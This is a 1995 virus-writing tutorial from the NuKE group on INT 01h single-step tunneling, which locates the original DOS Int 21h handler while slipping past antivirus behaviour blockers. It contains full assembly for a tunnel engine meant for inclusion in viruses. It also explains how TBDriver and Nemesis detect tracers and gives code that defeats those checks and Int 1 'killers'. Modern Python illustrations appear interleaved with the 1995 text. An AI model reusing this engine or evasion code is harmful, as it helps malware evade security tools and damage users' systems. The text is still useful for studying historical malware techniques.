Dark Fiber of [NuKE]

presents

Single Stepping Tunnel Techniques

Part 1

21st August 1995

File Descriptions:

df-tunnl.doc - This document
example.asm - Example program that calls tunnel.asm
example.com - Compiled example.asm
tunnel.asm - The basic tunneling engine.
f-Tunnel.asm - Full blown tunnel engine.
f-exampl.asm - Example using F-Tunnel
f-exampl.com - Compiled f-exampl.asm

Tunneling with INT 01h is an easy thing to do, about as easy as writing
*.COM file viruses, but for some reason guides to INT 01h tunneling
techniques don't exist the way *.COM file virus guides do, so I'm going to
remedy that.

Intel 8086+ processors and their compatible clones have a nice mode built
into them called Single Stepping, and it's VERY handy for programmers like us
who want to find something specific in memory, for example the kernel Int 21h
segment:offset, while bypassing other blocking TSR programs such as Anti-Virus
behaviour blockers. This tunneling technique is not the be-all and end-all
of tunneling; further on I will discuss some techniques that defeat this kind
of tunneling, and why they work.

In order to use the Single Step mode, we need to modify one of the bits
in the flags register, and have an interrupt handler set up.

The flags register is 16 bits wide and consists of the following fields.

       +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
flags  |--|--|--|--|OF|DF|IF|TF|SF|ZF|--|AF|--|PF|--|CF|
       +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
        0F 0E 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00

CF : Carry Flag       Indicates an arithmetic carry
-- : Unused
PF : Parity Flag      Indicates an even number of 1 bits
-- : Unused
AF : Auxiliary Flag   Indicates adjustment needed in BCD numbers
-- : Unused
ZF : Zero Flag        Indicates a zero result, or equal comparison
SF : Sign Flag        Indicates negative result/comparison
TF : Trap Flag        Controls Single Step operation
IF : Interrupt Flag   Controls whether interrupts are enabled
DF : Direction Flag   Controls increment direction on string regs.
OF : Overflow Flag    Indicates signed arithmetic overflow
-- : Unused
-- : Unused
-- : Unused
-- : Unused
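
To make the bit positions concrete, here is a small Python sketch (not part
of the original files) that decodes a 16-bit flags word using the table
above. The names FLAG_BITS, TF_MASK, decode_flags, set_tf and clear_tf are
made up for this illustration only.

```python
# Bit positions taken from the flags table above (bit 0 = CF ... bit 11 = OF).
# All names here are hypothetical helpers for illustration.
FLAG_BITS = {
    "CF": 0, "PF": 2, "AF": 4, "ZF": 6, "SF": 7,
    "TF": 8, "IF": 9, "DF": 10, "OF": 11,
}

TF_MASK = 1 << FLAG_BITS["TF"]  # bit 8, i.e. 0100h


def decode_flags(value):
    """Return the names of the flags set in a 16-bit word, lowest bit first."""
    ordered = sorted(FLAG_BITS.items(), key=lambda item: item[1])
    return [name for name, bit in ordered if value & (1 << bit)]


def set_tf(value):
    """Equivalent of OR with 0100h on the flags word."""
    return (value | TF_MASK) & 0xFFFF


def clear_tf(value):
    """Equivalent of AND with 0FEFFh on the flags word."""
    return value & ~TF_MASK & 0xFFFF


if __name__ == "__main__":
    word = set_tf(0x0202)
    print(hex(word), decode_flags(word))
```

The two masks are the same constants the listings use: 0100h to set the trap
flag and 0FEFFh to clear it.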

The only one we need to concern ourselves with is the TF flag.
When the trap flag is off, Int 01h is not used. When we turn TF on, the CPU
raises Int 01h after every instruction it completes, so our Int 01h routine
gets control BEFORE each following instruction is executed.

So, with that order in mind, you must hook Int 01h FIRST, THEN turn on the
trap flag.

The sequence is: save the old Int 1h vector, set our own Int 1h handler,
set the trap flag to on, then lastly, call the function that we wish to trace.

For the example code presented, we will be tunneling Int 21h.
All the code is for a minimum of an 80286 or greater, because I don't care
for coding for the lesser 8086 machine. ;)

;== [ 80286+ | Priming the Tunnel code ] ======================================
; This code will save and hook INT 01h, and put the processor into single
; stepping mode.
;

Int_01v: dd ? ;Old address for Int 01h
Int_21v: dd ? ;the tracer modifies this.

Tunnel:
pusha ;Save our registers,
push es ;Assume we are being called
push ds ;from an external source.

mov ax,03521h
int 021h ;Get Int 21h
cs: mov word ptr [Int_21v],bx ;Save Int 21h address
cs: mov word ptr [Int_21v + 2],es

mov al,01h ;Get Int 01h
int 021h
cs: mov word ptr [Int_01v],bx ;Save Int 01h address
cs: mov word ptr [Int_01v + 2],es

push cs
pop ds ;Set DS = CS for OUR Int 01
;address.
mov ah,025h
mov dx,offset Int_01Handler ;Our Int 01h routine
int 21h ;Set our Int 01h routine

;This first PUSHF, is used in conjunction with the CALL FAR [Int_21v]
;code, as we need a FLAGS on the stack that has not got the TF
;turned to ON.

pushf

pushf
pop ax ;Save the flag
or ax,0100 ;Set the TF to ON
push ax
popf ;restore the flags

;The moment we POPF the flags, the trace mode is initiated
;Because of the way it works, the first instruction immediately
;following the POPF is NOT traced, tracing begins with the
;second instruction AFTER the POPF.

mov ax,03306 ;Set AX for INTERNAL_DOS_VERS.
call far [Int_21v] ;Call the Int 21.
;we are faking an INT 21 call.

;The Int_01Handler routine takes over from here until the trace
;is finished. Only when it's finished will control pass back to this
;piece of code.

;When control is passed back, Int_21v will hold the segment:offset
;of the last cross segment jump before the trace ended.

;Restore the old Int_01h vector
lds dx,word ptr [Int_01v]
mov ax,02501
int 21h

pop ds
pop es
popa ;Restore registers
ret

;==============================================================================

Okay, before I code the Int_01Handler routine for you, we need to go
over some more theory.

First, the Int_01Handler routine is designed to check which opcode
is going to be run next, so we need to know some of the opcodes that
we will have to check for.

26h ES:
2Eh CS:
36h SS:
3Eh DS:
These four are the segment overrides, and are ALWAYS
placed BEFORE the opcode, but the CPU sees them as
part of the same instruction, so we must check for these
and then siphon them off to get the byte value of
the real opcode. We also use them to determine
what segment to take data from on things like FAR
cross segment jumps.

9Ch PUSHF
We need to know this so we can get around Nemesis.

9Dh POPF
We need to check for the POPF because we don't want
any other program turning off the Trap Flag and
thus disabling our trace.

CFh IRET
This is what we use to signal that our trace should
end.

EAh JMP xxxx:yyyy
FFh 1Eh CALL FAR [xxxx]
FFh 2Eh JMP FAR [xxxx]

These three opcodes are used as cross segment jumps,
which commonly hold the seg:offs of the next Int hook.
Because the last two (FF1Eh, FF2Eh) take data from
the segment override, or the current DS, we need to
know what that is too.
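
As a rough illustration of the opcode table above, here is a Python sketch
(not part of the original files) that strips one segment override and
classifies the byte that follows. The function name classify and its return
format are assumptions made for this example, and it only handles a single
prefix byte.

```python
# Hypothetical helper: classify the instruction at the start of a byte string,
# using only the opcodes listed in the table above.
SEGMENT_PREFIXES = {0x26: "ES", 0x2E: "CS", 0x36: "SS", 0x3E: "DS"}
SIMPLE_OPCODES = {0x9C: "PUSHF", 0x9D: "POPF", 0xCF: "IRET"}


def classify(code):
    """Return (segment, kind, operand) for the instruction in `code`.

    segment is the override if one is present, otherwise "DS".
    operand is (seg, off) for JMP xxxx:yyyy, the pointer offset for the
    FF 1E / FF 2E forms, and None otherwise.
    """
    pos = 0
    segment = "DS"
    if code[pos] in SEGMENT_PREFIXES:      # siphon off the override
        segment = SEGMENT_PREFIXES[code[pos]]
        pos += 1

    opcode = code[pos]
    if opcode in SIMPLE_OPCODES:
        return segment, SIMPLE_OPCODES[opcode], None

    if opcode == 0xEA:                     # offset first, then segment
        off = int.from_bytes(code[pos + 1:pos + 3], "little")
        seg = int.from_bytes(code[pos + 3:pos + 5], "little")
        return segment, "JMP FAR imm", (seg, off)

    second = code[pos + 1:pos + 2]         # slice avoids an IndexError
    if opcode == 0xFF and second in (b"\x1e", b"\x2e"):
        kind = "CALL FAR [mem]" if second == b"\x1e" else "JMP FAR [mem]"
        pointer = int.from_bytes(code[pos + 2:pos + 4], "little")
        return segment, kind, pointer

    return segment, "OTHER", None


if __name__ == "__main__":
    print(classify(bytes([0x2E, 0xFF, 0x2E, 0x10, 0x00])))
```

Note that for the two FF forms the operand is only the offset of a stored
seg:offs pair, which is why the segment (override or DS) has to be known.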

;== [ 80286+ | Tunnel Engine ] ================================================
;This is the actual code that does all the hard work.
;It has been somewhat (20bytes) optimised from the engine I used in Lady Death
;And bugfixed too ;)

;These are our register offsets into the SS:SP[BP]

_rfl equ 01A
_rcs equ 018
_rip equ 016
_ax equ 014
_cx equ 012
_dx equ 010
_bx equ 0E
_sp equ 0C
_bp equ 0A
_si equ 08
_di equ 06
_es equ 04
_ds equ 02
_ss equ 00

Int_01Handler:
pusha
push es
push ds ;Save ALL registers.
push ss ;Its not really necessary to save SS ;)
mov bp,sp ;but this engine was built for expansion

;One thing to note, if you want to know the TRUE value of SP, that
;is, you must subtract 6 from it, which covers the calling cs, ip & f.
;and thats sub w[bp+_sp],6 not sub sp,6 ;)

push cs
pop ds

test b[_status],1
je RunNextTest_1
xor b[_status],1
and word ptr [bp+_rfl+2],0feff
jmp GetOpCode

RunNextTest_1:

GetOpCode:
lds si,word ptr [bp+22] ;Get the seg:off of the next opcode

cld ;clear direction
lodsb ;get opcode

;AL now holds our bytevalue opcode.

;Check for a segment override, and if not, assume its working in DS
call GetSegOveride ;Get the segment override
;bx = segment we will be using.

;Check the OPCode in AL
cmp al,09dh ;POPF?
jne ItsNotPOPF
;They are attempting to POP the flags. Just incase they have tried
;to turn the TF off, we keep it turned on.
or word ptr [bp+_rfl+2],0100 ;Keep TRAPFLAG set to on.

ItsNotPOPF:
cmp al,09c
jne ItsNotPUSHF
cs: or byte ptr [_status],1

ItsNotPUSHF:
cmp al,0cf ;IRET
jne ItsNotIRET
;An IRET signals the end of our trace.
;So turn the TF to off.
and word ptr [bp+_rfl],0feff ;Turn trace flag off

ItsNotIRET:
cmp al,0eah ;Jmp xxxx:yyyy
jne ItsNotFarJump

;A Cross segment jump! Save the seg:offset its going to jump into.
;The data for the cross seg jump is contained in the CS: seg.
;So, no change is needed.

FarJumpData:
lodsw
cs: mov word ptr [Int_21v+0],ax
lodsw
cs: mov word ptr [Int_21v+2],ax
jmp RunNextOpCode

ItsNotFarJump:
cmp al,0ffh ;jmp d[xxxx]
jne ItsNotJmpD

cmp byte ptr [si],01eh ;jmp d[xxxx], type 1
jne ItsJmpD
cmp byte ptr [si],02eh ;jmp d[xxxx], type 2
jne ItsNotJmpD

ItsJmpD:
inc si ;skip jump type

;This opcode can use a segment override, so use it!
mov ds,bx ;segment override
lodsw ;get storage offset of seg:offs
mov si,ax ;
jmp FarJumpData ;treat it like jmp xxxx:yyyy

ItsNotJmpD:
;Next opcode here....
;Well, we dont need to monitor any more opcodes....

RunNextOpCode:
pop ss
pop ds
pop es ;Restore the registers
popa
iret ;Run the next opcode.

GetSegOveride:
cmp al,026h ;ES
jne NotSegES
mov bx,word ptr [bp+_es]
lodsb ;Skip seg override, to get next opcode
ret

NotSegES:
cmp al,02eh ;CS
jne NotSegCS
mov bx,word ptr [bp+_rcs]
lodsb ;Skip seg override, to get next opcode
ret

NotSegCS:
cmp al,036h ;SS
jne NotSegSS
mov bx,word ptr [bp+_ss]
lodsb ;Skip seg override, to get next opcode
ret

NotSegSS:
cmp al,03eh ;DS
jne NotSegDS
mov bx,word ptr [bp+_ds]
lodsb ;Skip seg override, to get next opcode
ret

NotSegDS:
mov bx,word ptr [bp+_ds] ;DS
ret ;No override, so assume DS

_status: db 0

;==============================================================================

The code presented here is, when compiled, somewhere around 200 bytes
long, which I think is not too big when you include it in a virus.
The engine presented here is very basic in its structure. It does not
check for things like

JMP DOUBLE [BX+4]
JMP DOUBLE [BX]
JMP DOUBLE [SI-4]

etc,
or

CALL DOUBLE [BX]

The reason is that there are lots of other techniques for cross segment
jumping; including all types would expand the engine considerably, and
they are not really necessary in a virus.

Single Stepping Tunneling Techniques

Part 2

Anti-Tracers

Okay, so you have run the Example.Com program and TBDriver has beeped
with a message that Example.Com is trying to trace the interrupt chain, or
something to that effect. Your first question should be "How the hell does it
know we are tracing it?"

Well, I'm glad you asked! ;)

Here is a simple representation

        Code Memory                     Stack Memory

        mov     ax,1234h
        push    ax                      1234h
        mov     bx,5678h                1234h
        mov     cx,DEADh                1234h
        push    cx                      DEADh, 1234h
        push    bx                      5678h, DEADh, 1234h

        pop     ax      ;=5678h         DEADh, 1234h
        pop     bx      ;=DEADh         1234h
        pop     cx      ;=1234h

Now, even though we have popped them off the stack, what has actually
happened is that SP had 2 added to it each time, adjusting where it points to,
but those values ARE STILL IN MEMORY, just below where SP currently points.

so, if we did

sub sp,6

the Stack Memory would look like

5678h, DEADh, 1234h

The contents of memory have not been altered in any way, just the pointer
to the memory has.
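
If you want to play with this idea outside of a debugger, here is a small
Python model (not part of the original files). The Stack class is invented
for this illustration, and it counts in words rather than bytes, so the
"sub sp,6" above becomes "sp -= 3" here.

```python
# Hypothetical word-addressed model of a downward-growing stack.
class Stack:
    def __init__(self, size=16):
        self.mem = [0] * size   # stack memory, one entry per 16-bit word
        self.sp = size          # empty stack: SP sits just past the top

    def push(self, value):
        self.sp -= 1
        self.mem[self.sp] = value

    def pop(self):
        value = self.mem[self.sp]   # the word is read, NOT erased
        self.sp += 1
        return value

    def view(self):
        """Words from SP upwards, top of stack first."""
        return self.mem[self.sp:]


def demo():
    s = Stack()
    s.push(0x1234)
    s.push(0xDEAD)
    s.push(0x5678)
    popped = [s.pop(), s.pop(), s.pop()]
    s.sp -= 3                   # same idea as sub sp,6
    return popped, s.view()


if __name__ == "__main__":
    popped, residue = demo()
    print([hex(v) for v in popped], [hex(v) for v in residue])
```

After the three pops the stack is empty as far as SP is concerned, yet
moving SP back down shows the same three words again.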

Now, using the above example, this is what happens when we tunnel

Assume that for each int 1, CS=code, flags=flags, and the number shown is
the IP of the next instruction.

When an INT occurs, it pushes the flags, cs, and ip onto the stack.

        Code Memory                     Stack Memory
        cs:=code

     1) mov     ax,1234h
     2) *int 1*                         3, code, flags,
     3) push    ax                      1234h
     4) *int 1*                         5, code, flags, 1234h
     5) mov     bx,5678h                1234h
     6) *int 1*                         7, code, flags, 1234h
     7) mov     cx,DEADh                1234h
     8) *int 1*                         9, code, flags, 1234h
     9) push    cx                      DEADh, 1234h
     a) *int 1*                         b, code, flags, DEADh, 1234h
     b) push    bx                      5678h, DEADh, 1234h
     c) *int 1*                         d, code, flags, 5678h, DEADh...
     d) pop     ax      ;=5678h         DEADh, 1234h
     e) *int 1*                         f, code, flags, DEADh, 1234h
     f) pop     bx      ;=DEADh         1234h
    10) *int 1*                         11, code, flags, 1234h
    11) pop     cx      ;=1234h

Now, if we were to subtract 6 from SP, this time our Stack Memory would look
like this,

code, flags, 1234h

Notice that the lowest 4 bytes are not 5678h, DEADh. That's because when an
Int 1 occurs, it overwrites what's underneath SP.

(Hope I'm explaining this so you understand ;)

This is how TBDriver detects that a tracer is in memory.

Here is the actual TBDriver code

push bx
push ax
xchg ax,bx
pop ax
dec sp
dec sp
pop bx
cmp ax,bx
pop bx

Now, when it's run without a tracer its Stack Memory looks like this

assume ax=1234, bx=5678

        Code                            Stack
        push    bx      ;bx=5678h       5678h

        push    ax      ;ax=1234h       1234h, 5678h

        xchg    ax,bx   ;ax=5678h       1234h, 5678h
                        ;bx=1234h

        pop     ax      ;ax=1234h       5678h
                        ;bx=1234h
        dec     sp                      34h, 5678h
        dec     sp                      1234h, 5678h

        pop     bx      ;ax=1234h       5678h
                        ;bx=1234h

        cmp     ax,bx   ;ax=1234h       5678h
                        ;bx=1234h

        pop     bx      ;ax=1234h
                        ;bx=5678h

Underneath the stack, it looks like this

1234h, 5678h

Because the SP is decremented, and the stack untouched, 1234h is still
there.

Now, if we traced it....

        Code                            Stack
        push    bx      ;bx=5678h       5678h

        *int 1*                         ip, code, flags, 5678h

        push    ax      ;ax=1234h       1234h, 5678h

        *int 1*                         ip, code, flags, 1234h, 5678h

        xchg    ax,bx   ;ax=5678h       1234h, 5678h
                        ;bx=1234h

        *int 1*                         ip, code, flags, 1234h, 5678h

        pop     ax      ;ax=1234h       5678h
                        ;bx=1234h

        *int 1*                         ip, code, flags, 5678h

        dec     sp                      ags, 5678h
        dec     sp                      flags, 5678h

        *int 1*                         ip, code, flags, flags, 5678h

        pop     bx      ;ax=1234h       5678h
                        ;bx=flags
        *int 1*                         ip, code, flags, 5678h

        cmp     ax,bx   ;ax=1234h       5678h
                        ;bx=flags

        *int 1*                         ip, code, flags, 5678h

        pop     bx      ;ax=1234h
                        ;bx=5678h

Now, when SP is decremented, the flags word pushed by the last Int 1 has
overwritten the previously pushed AX in memory. TB detects this,
notices the value is not what it expected, and knows we are tracing it.
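
The two walkthroughs above can be replayed with a short Python model (not
part of the original files). It is only a sketch: the function name
residue_intact and the frame values FLAGS, CS and IP are arbitrary choices
for this illustration, the stack is counted in words, and the two DEC SP
instructions are treated as a single step, as in the diagrams.

```python
# Arbitrary illustrative values for the frame an interrupt pushes.
FLAGS, CS, IP = 0x0302, 0xC0DE, 0x0100


def residue_intact(traced, ax=0x1234, bx=0x5678):
    """Replay the push/pop/dec sp check; True means AX == BX at the CMP."""
    mem = [0] * 32
    sp = 32

    def push(value):
        nonlocal sp
        sp -= 1
        mem[sp] = value

    def pop():
        nonlocal sp
        value = mem[sp]
        sp += 1
        return value

    def trap():
        # Under single stepping, every step is followed by an Int 1:
        # flags, cs and ip are pushed, then removed again by the IRET.
        if traced:
            push(FLAGS)
            push(CS)
            push(IP)
            pop()
            pop()
            pop()

    push(bx)
    trap()
    push(ax)
    trap()
    ax, bx = bx, ax     # xchg ax,bx
    trap()
    ax = pop()          # pop ax
    trap()
    sp -= 1             # dec sp / dec sp
    trap()
    bx = pop()          # pop bx reads whatever now sits below the old top
    trap()
    return ax == bx     # cmp ax,bx


if __name__ == "__main__":
    print("untraced:", residue_intact(False))
    print("traced:  ", residue_intact(True))
```

In this model the comparison only matches when no interrupt frame was
written below SP between the POP AX and the second POP BX.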

How do we get around this? Well, TBDriver is structured so that
the first two bytes are a short jump OVER a far jump to the original
DOS Int 21h. So we check for the TBDriver code, and use the far jump data ;)

The code to fool TBDriver looks like this

;Place this code underneath the ItsNotJmpD: label.
TBKiller:
cmp al,0fah ;CLI?
jne EndTBKiller
lodsw
cmp ax,0fc9c ;Is it TBDriver?
jne EndTBKiller
lodsw
cmp ax,05053 ;TBDriver?
jne EndTBKiller
sub si,10
mov w[bp+_rip],si ;Run the original FAR jump
inc si ;skip EAh, so its data.
jmp FARJumpData

EndTBKiller:

"Gee, I heard Nemesis is damn tricky?" Eh? Not any more! All Nemesis
does to find tracers is a PUSHF, followed by a compare of W[BP+xx] against
0404 and a JB. If the TF is on, the FLAGS value is > 0404, so we add a status
bit that tells us that the LAST OPCODE RUN was a PUSHF, and then remove the
TF from the pushed flags ;) Now is that simple or what?

The last method of killing a tracer while it's running goes like this.

1. Get the address of Int 1h
2. Replace the first byte of the Int 1h seg:offs with an IRET opcode
3. Remove the trace flag
4. Restore the first byte of Int 1h

To do that the code looks like

mov ax,03501h
int 21h
mov cl,0CFh
es: xchg byte ptr [bx], cl
pushf
pop ax
and ax,0feff
push ax
popf
es: xchg byte ptr [bx], cl

Now, how do you defeat this? Well, this *type* is pretty easy to avoid too.
The code goes something like this.

;Under the EndTBKiller: label goes this,

Kill_INT_1_Killers:
cmp al,0CDh ;INT call?
jne End_Kill_Int_1_Killers
cmp byte ptr [si],021h ;21?
jne End_Kill_Int_1_Killers
cmp word ptr [bp+_ax],03501 ;GET INT 1?
jne End_Kill_Int_1_Killers
cs: or byte ptr [_Status],2 ;turn on fake int address
End_Kill_Int_1_Killers:

;Under RunNextTest_1: put the code
test byte ptr [_Status],2 ;fake the address?
je RunNextTest_2
xor byte ptr [_Status],2
mov ax, word ptr [Int_01v] ;get the orig, int 1 address
mov word ptr [bp+_bx],ax ;put in into bx
mov ax, word ptr [Int_01v+2]
mov word ptr [bp+_es],ax ;put it into es
;Now when it writes a byte to int 1, it
;will be writing to the unused int 1.
RunNextTest_2:

But what happens if they get our Int_1 address directly from the IVT?
Well..... you can check if they are putting a byte into our segment,
but, because of the myriad of different ways one can put a byte into
a position in memory, well, if you are a masochist you can come up with
that code all by yourself.

Well, I hope I've explained it so that you understand how tunnelers work.
If you want to see a different kind of tunneler check out ART 2.2, the
full source code is in vlad#4. This tunneler does not use int 1, but rather
decodes each single opcode.

Ah well, if you didn't understand, then I really screwed up.